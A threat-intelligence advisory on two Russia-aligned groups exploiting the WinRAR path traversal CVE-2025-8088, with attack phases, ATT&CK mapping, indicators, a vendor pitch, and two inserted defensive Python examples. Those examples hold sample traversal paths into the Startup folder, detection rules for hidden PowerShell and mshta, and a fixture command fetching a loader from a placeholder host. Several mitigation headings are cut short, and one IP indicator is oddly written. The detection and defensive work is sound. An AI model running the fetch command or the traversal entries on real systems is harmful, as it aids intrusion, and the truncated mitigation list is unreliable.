Two Actors, One Flaw: Gamaredon and UAC-0226 Leverage Delayed WinRAR Patching

Jun 10, 2026

Two Russia-aligned threat groups, Gamaredon and UAC-0226, are actively exploiting CVE-2025-8088, a high-severity WinRAR path traversal vulnerability, against Ukrainian government, military, and critical infrastructure organizations. Nearly a year after a patch was made available, both groups continued to operate unimpeded.

While both actors exploit the same vulnerability, their objectives and methods diverge sharply. Gamaredon, a Russian FSB-attributed group operational since 2013, deploys a sophisticated multi-stage toolchain designed for long-term persistent access and continuous intelligence collection. UAC-0226, a separately tracked Russia-aligned cluster, takes a leaner approach, deploying the GIFTEDCROOK stealer to harvest browser credentials and sensitive documents before erasing all forensic evidence and exiting cleanly.


Vulnerability & Affected Products

CVE ID: CVE-2025-8088

CVSS Score: 8.8 High

Vulnerability Type: Path Traversal (CWE-22), allows arbitrary file placement outside the intended extraction directory via NTFS Alternate Data Streams

Affected Products: RARLAB WinRAR for Windows, all versions before 7.13

Fixed Version: WinRAR 7.13 (patch published July 2025)

Attack Vector: Requires the target to open a malicious RAR archive containing a weaponised payload hidden via path traversal

Primary Impact: Attackers silently place malicious files directly into sensitive Windows locations such as the Startup folder, achieving automatic code execution on the next user login
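The defensive counterpart of the flaw described above is a containment check on archive member names before anything is written to disk. The following is an added example, not code from the SecPod article or from RARLAB: it resolves each member name against the extraction directory and refuses entries that carry an NTFS stream suffix, are absolute or UNC paths, or resolve outside the destination, labelling the Startup folder case so an analyst sees why a flagged entry matters. The article does not describe how the ADS-based traversal is encoded inside the RAR headers, so the check is deliberately generic; the destination path, member list and `STARTUP_FRAGMENT` constant are constructed for the example.

```python
"""
Added example (not SecPod's or RARLAB's code): a containment check for
archive member names, the defensive counterpart of the WinRAR path
traversal tracked as CVE-2025-8088.

Member names and the destination are handled as Windows paths via ntpath,
so the check runs on any platform.  Nothing here parses RAR data; it only
judges names an archive claims its entries should be written to.
"""
from __future__ import annotations

import ntpath
from dataclasses import dataclass

# Auto-run folder fragment (case-insensitive), used only to label verdicts.
STARTUP_FRAGMENT = "\\microsoft\\windows\\start menu\\programs\\startup\\"


@dataclass(frozen=True)
class Verdict:
    member: str
    allowed: bool
    reason: str


def resolve_member(dest_dir: str, member: str) -> str:
    """Resolve a member name against dest_dir the way an extractor would,
    collapsing '.' and '..'.  dest_dir must be an absolute Windows path."""
    name = member.replace("/", "\\")
    return ntpath.normpath(ntpath.join(ntpath.normpath(dest_dir), name))


def check_member(dest_dir: str, member: str) -> Verdict:
    name = member.replace("/", "\\")
    # A colon never appears in a legitimate NTFS file name: it is either a
    # drive letter ("C:\...") or an Alternate Data Stream ("file.pdf:payload").
    if ":" in name:
        return Verdict(member, False, "contains ':' (drive letter or NTFS ADS)")
    if name.startswith("\\"):
        return Verdict(member, False, "absolute or UNC path")
    dest = ntpath.normpath(dest_dir).lower().rstrip("\\")
    target = resolve_member(dest_dir, member).lower()
    if not (target == dest or target.startswith(dest + "\\")):
        where = ("the Startup auto-run folder" if STARTUP_FRAGMENT in target
                 else "outside the destination")
        return Verdict(member, False, f"path traversal: resolves to {where}")
    return Verdict(member, True, "ok")


def scan_archive(dest_dir: str, members: list[str]) -> list[Verdict]:
    """One verdict per member, in archive order."""
    return [check_member(dest_dir, m) for m in members]


def unsafe_members(dest_dir: str, members: list[str]) -> list[str]:
    """Names that must not be extracted to dest_dir."""
    return [v.member for v in scan_archive(dest_dir, members) if not v.allowed]


# Constructed sample shaped like the article's description: one visible decoy
# PDF plus entries that try to leave the extraction directory.
DEST = r"C:\Users\olena\Downloads\invoice"
SAMPLE_MEMBERS = [
    "invoice.pdf",                      # the decoy the victim sees
    "attachments/photo.jpg",            # ordinary nested entry, allowed
    "invoice.pdf:payload",              # ADS suffix
    r"..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.hta",
    r"\\fileserver\share\drop.lnk",     # UNC path
]


def main() -> None:
    for v in scan_archive(DEST, SAMPLE_MEMBERS):
        print(f"{'ALLOW' if v.allowed else 'BLOCK':5} {v.member!r}: {v.reason}")


if __name__ == "__main__":
    main()
```

Feed it the name list of a parsed archive (for example `RarFile.namelist()` from the `rarfile` package, which needs an unrar backend) rather than a listing produced by the extractor you are trying to protect; a vulnerable extractor may already have normalised the names you need to judge.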

Background

Gamaredon (also tracked as Armageddon, Earth Dahu) is a Russian state-sponsored threat group formally attributed to the Federal Security Service (FSB) by the Security Service of Ukraine and corroborated by multiple Western intelligence agencies. Operational since at least 2013, the group focuses exclusively on Ukrainian targets such as government ministries, military personnel, law enforcement, and critical infrastructure. What sets Gamaredon apart is their combination of high operational tempo and deliberate evasion: they run high-frequency spear-phishing campaigns, iterate their malware rapidly to outpace signatures, and systematically abuse legitimate platforms such as Telegram, Cloudflare, and Supabase as Dead Drop Resolvers for C2, blending malicious traffic with ordinary internet use. Trend Micro specifically describes Gamaredon as known for an "industrial-scale effort" to maintain long-term access to compromised organisations.

UAC-0226 (tracked as SHADOW-EARTH-066) is a separately tracked Russia-aligned cluster that has historically targeted Ukrainian organisations with Excel macro droppers. In this campaign, the group has made a notable tactical shift, abandoning macro-based delivery in favour of the CVE-2025-8088 RAR exploit chain. Equally notable is their move away from Telegram as an exfiltration channel to dedicated C2 servers, a change which is assessed as likely driven by Russia's blocking of Telegram in February 2026. Unlike Gamaredon, UAC-0226 prioritises clean exits: all malicious artifacts are deleted from the victim host after data is exfiltrated.


Attack Methodology

Gamaredon (Earth Dahu)

Phase 1: Spear-Phishing Delivery: A weaponised xHTML file is delivered via spear-phishing email. Upon opening, it displays a decoy message while sending a 1×1 tracking pixel to attacker infrastructure to confirm victim engagement, a Gamaredon technique in continuous use since 2018.

Phase 2: CVE-2025-8088 Exploitation: The xHTML page performs HTML smuggling, dropping a Base64-encoded RAR archive. When the victim extracts the visible PDF, the hidden HTA payload is silently placed into the Windows Startup folder via path traversal.

Phase 3: GammaPhish Execution: On next login, Windows auto-executes the HTA file. It invokes mshta.exe with a remote payload URL disguised by a fake BBC.com prefix; the fetched script retrieves and executes GammaLoad.

Phase 4: GammaLoad Staging: GammaLoad operates as a cascading four-stage VBScript downloader. It fingerprints the host, resolves live C2 addresses by parsing Telegram and Cloudflare-hosted Dead Drop Resolver pages, stores configuration in the Windows registry, and fetches final payloads.

Phase 5: GammaWorm Persistence and Propagation: GammaWorm copies itself into NTFS Alternate Data Streams, creates three scheduled tasks, and writes a RunOnce registry key. It then propagates to USB drives and network shares by hiding legitimate directories and replacing them with malicious LNK shortcuts that carry Ukrainian-language social-engineering lures.

Phase 6: GammaSteel Exfiltration: GammaSteel deploys 71 DPAPI-encrypted PowerShell modules into the Windows registry. It monitors local drives, network shares, and USB insertions in real time, exfiltrating targeted files to an S3-compatible cloud storage bucket with a fallback to attacker-controlled C2 servers.


UAC-0226 (SHADOW-EARTH-066)

Phase 1: RAR Archive Delivery: A crafted RAR archive is delivered to Ukrainian targets. The archive appears to contain a single decoy PDF document but contains three hidden payloads placed outside the extraction directory via CVE-2025-8088.

Phase 2: CVE-2025-8088 Exploitation: When the victim extracts the visible PDF, the three hidden ADS payloads are silently written to their target paths, including a Windows Shortcut (LNK) file placed directly into the Startup folder.

Phase 3: LNK Auto-Execution: On next login, Windows executes the LNK shortcut, which spawns a PowerShell loader via cmd.exe using in-memory DLL loading to avoid writing the final payload to disk.

Phase 4: GIFTEDCROOK Deployment: The PowerShell loader launches GIFTEDCROOK (result.dll), an updated information stealer targeting saved passwords and cookies from Chromium-based browsers (Chrome, Edge, Opera) and Firefox, as well as documents matching specific extensions from the victim's machine.

Phase 5: Exfiltration and Cleanup: Harvested credentials and documents are exfiltrated to dedicated C2 servers. Once exfiltration is completed, all malicious artifacts are deleted from the host to erase the forensic trail — a deliberate exit strategy that distinguishes UAC-0226 from Gamaredon's persistent-access model.




Visual Attack Flow

Gamaredon: Spear-Phishing xHTML Delivered → 1×1 Tracking Pixel Confirms Victim Opened Lure → HTML Smuggling Drops Weaponised RAR → CVE-2025-8088 Places HTA in Windows Startup Folder → GammaPhish Executes on Next Login via mshta.exe → GammaLoad Fetched via Fake-Legitimate URL → Host Fingerprinted, C2 Resolved via Telegram/Cloudflare DDRs → GammaWorm Deployed, Modules Hidden in NTFS ADS → Three Scheduled Tasks Created for Persistent Execution → USB Drives and Network Shares Hijacked with Malicious LNK Files → GammaSteel Activated, 71 Encrypted Modules Staged in Registry → Files Exfiltrated to AWS S3 with C2 Fallback → Persistent Multi-Stage Access Established


UAC-0226: Crafted RAR Archive Delivered → CVE-2025-8088 Places LNK Shortcut in Startup Folder + Two Additional ADS Payloads Written → LNK Auto-Executes on Next User Login → cmd.exe Spawns PowerShell Loader → In-Memory DLL Load Executes GIFTEDCROOK → Browser Passwords, Cookies, and Documents Harvested → Data Exfiltrated to Dedicated C2 Server → All Malicious Artifacts Deleted, Forensic Trail Erased



MITRE ATT&CK: Tactics and Techniques


| ID | Tactic | Technique | Applies To | Description |
|----|--------|-----------|------------|-------------|
| TA0001 | Initial Access | T1566.001 — Spear-phishing Attachment | Both | Weaponised archives delivered via targeted phishing emails to Ukrainian government and military entities. |
| TA0002 | Execution | T1204.002 — Malicious File | Both | Victim opens RAR archive triggering CVE-2025-8088; dropped payload auto-executes from Windows Startup on next login. |
| TA0003 | Persistence | T1053.005 — Scheduled Task | Gamaredon | GammaWorm creates three scheduled tasks for redundant, reboot-surviving persistence. |
| TA0003 | Persistence | T1547.001 — Registry Run Keys / Startup Folder | Gamaredon | GammaWorm writes a RunOnce key (`ExplorerGuard`) to execute its ADS copy on every user logon. |
| TA0005 | Defense Evasion | T1564.004 — NTFS Alternate Data Streams | Both | Gamaredon hides core modules in NTFS ADS; UAC-0226 uses ADS to place hidden payloads outside the extraction directory. |
| TA0006 | Credential Access | T1555.003 — Credentials from Web Browsers | UAC-0226 | GIFTEDCROOK harvests saved passwords and cookies from Chromium and Firefox browser profiles. |

Indicators of Compromise

Gamaredon

| Type | Indicator |
|------|-----------|
| Operator-Controlled C2 Domain | quitethepastry[.]ru |
| C2 IP Address | 04.194.140[.]6 |


UAC-0226

| Type | Indicator |
|------|-----------|
| Payload Filename | result.dll (GIFTEDCROOK) |
| Post-Exfiltration | All malicious artifacts self-deleted |

Key Takeaways & Mitigation

1. Update WinRAR to Version 7.13 Immediately

2. Block Automatic HTA and LNK Execution

3. Audit NTFS Alternate Data Streams

4. Monitor and Audit Scheduled

5. Control USB Drive Access and Scan on

6. Monitor Dead Drop Resolver

7. Protect Browser Credential Stores
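The post-extraction behaviours described in the two attack chains (an archiver writing into the Startup folder, mshta.exe fetching a remote payload, cmd.exe spawning a hidden PowerShell loader, modules written to NTFS ADS, a RunOnce value and scheduled tasks) each leave a distinct telemetry trace, which is what mitigation items 2 to 4 rely on. The block below is an added example, not SecPod's or any vendor's detection content: it runs a small rule set over constructed Sysmon-style events (EventID 1, 11, 13, 15) and a Security-log 4698 event, tags each hit with the ATT&CK technique from the table above, and escalates a host once two distinct rules fire. The hostnames, paths, command lines and the escalation threshold are all assumptions made for the example.

```python
"""
Added example (not SecPod's code): a detection pass over constructed
Sysmon / Security-log style events for the behaviours the article attributes
to both actors after the malicious RAR is opened.  All events are made up
for the example; nothing is taken from a real incident.
"""
from __future__ import annotations

from collections import defaultdict
from typing import Callable

STARTUP = "\\microsoft\\windows\\start menu\\programs\\startup\\"
AUTORUN_EXT = (".hta", ".lnk", ".vbs", ".js", ".cmd", ".bat", ".exe", ".ps1")
HIDDEN_PS_FLAGS = ("-w hidden", "-windowstyle hidden", "-enc", "-nop")


def _img(e: dict, key: str = "Image") -> str:
    """Lower-case basename of an image path field (empty if absent)."""
    return e.get(key, "").rsplit("\\", 1)[-1].lower()


# (rule name, ATT&CK technique, predicate over one event)
RULES: list[tuple[str, str, Callable[[dict], bool]]] = [
    ("archive_write_to_startup", "T1547.001",   # Sysmon 11: file create
     lambda e: e["EventID"] == 11 and _img(e) == "winrar.exe"
     and STARTUP in e.get("TargetFilename", "").lower()
     and e.get("TargetFilename", "").lower().endswith(AUTORUN_EXT)),
    ("mshta_remote_payload", "T1218.005",        # Sysmon 1: process create
     lambda e: e["EventID"] == 1 and _img(e) == "mshta.exe"
     and "http" in e.get("CommandLine", "").lower()),
    ("cmd_to_hidden_powershell", "T1059.001",
     lambda e: e["EventID"] == 1 and _img(e) == "powershell.exe"
     and _img(e, "ParentImage") == "cmd.exe"
     and any(f in e.get("CommandLine", "").lower() for f in HIDDEN_PS_FLAGS)),
    ("ads_stream_written", "T1564.004",          # Sysmon 15: stream create
     lambda e: e["EventID"] == 15
     and ":" in e.get("TargetFilename", "")[2:]  # skip the drive-letter colon
     and not e.get("TargetFilename", "").lower().endswith(":zone.identifier")),
    ("runonce_key_set", "T1547.001",             # Sysmon 13: registry value set
     lambda e: e["EventID"] == 13
     and "\\currentversion\\runonce\\" in e.get("TargetObject", "").lower()),
    ("scheduled_task_created", "T1053.005",      # Security 4698
     lambda e: e["EventID"] == 4698),
]


def evaluate(events: list[dict]) -> dict[str, list[tuple[str, str]]]:
    """Map host -> [(rule, technique), ...] for every event that fires a rule."""
    hits: dict[str, list[tuple[str, str]]] = defaultdict(list)
    for e in events:
        for name, tech, pred in RULES:
            if pred(e):
                hits[e["Computer"]].append((name, tech))
    return dict(hits)


def escalate(hits: dict[str, list[tuple[str, str]]], threshold: int = 2) -> set[str]:
    """Hosts on which at least `threshold` distinct rules fired."""
    return {h for h, rs in hits.items() if len({r for r, _ in rs}) >= threshold}


SU = r"C:\Users\olena\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    # WS-01: HTA dropped into Startup, remote fetch via mshta, ADS, RunOnce, task.
    {"Computer": "WS-01", "EventID": 11, "Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "TargetFilename": SU + r"\update.hta"},
    {"Computer": "WS-01", "EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'mshta.exe "https://payload.example.invalid/loader"'},
    {"Computer": "WS-01", "EventID": 15, "Image": r"C:\Windows\System32\wscript.exe",
     "TargetFilename": r"C:\Users\olena\AppData\Local\Temp\svc.txt:main"},
    {"Computer": "WS-01", "EventID": 13, "Image": r"C:\Windows\System32\wscript.exe",
     "TargetObject": r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\ExplorerGuard"},
    {"Computer": "WS-01", "EventID": 4698, "TaskName": r"\ExplorerGuard"},
    # WS-02: LNK dropped into Startup, then cmd.exe -> hidden PowerShell loader.
    {"Computer": "WS-02", "EventID": 11, "Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "TargetFilename": SU.replace("olena", "taras") + r"\report.lnk"},
    {"Computer": "WS-02", "EventID": 1, "Image": PS,
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -w hidden -nop -c <loader placeholder>"},
    # WS-03: benign noise that must not fire.
    {"Computer": "WS-03", "EventID": 15, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "TargetFilename": r"C:\Users\iryna\Downloads\brief.pdf:Zone.Identifier"},
    {"Computer": "WS-03", "EventID": 1, "Image": PS,
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe"},
]


def main() -> None:
    hits = evaluate(EVENTS)
    hot = escalate(hits)
    for host, rules in hits.items():
        print(f"{host}: {'ESCALATE' if host in hot else 'watch'} {sorted({r for r, _ in rules})}")


if __name__ == "__main__":
    main()
```

The rules are intentionally narrow so that ordinary use (a browser writing a Zone.Identifier stream, an interactive PowerShell session) produces nothing; the correlation step is what turns single low-confidence hits into an alert, which suits both the noisy Gamaredon chain and the leaner UAC-0226 chain.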


Instantly Fix Risks with Saner Patch Management

Saner Patch Management is a continuous, automated, and integrated solution that instantly fixes risks exploited in the wild. It supports major operating systems, including Windows, Linux, and macOS, as well as 550+ third-party applications.


It includes a safe testing sandbox to validate patches before production deployment, along with a patch rollback feature in the event of failure or system malfunction, ensuring your infrastructure stays protected without downtime risk.
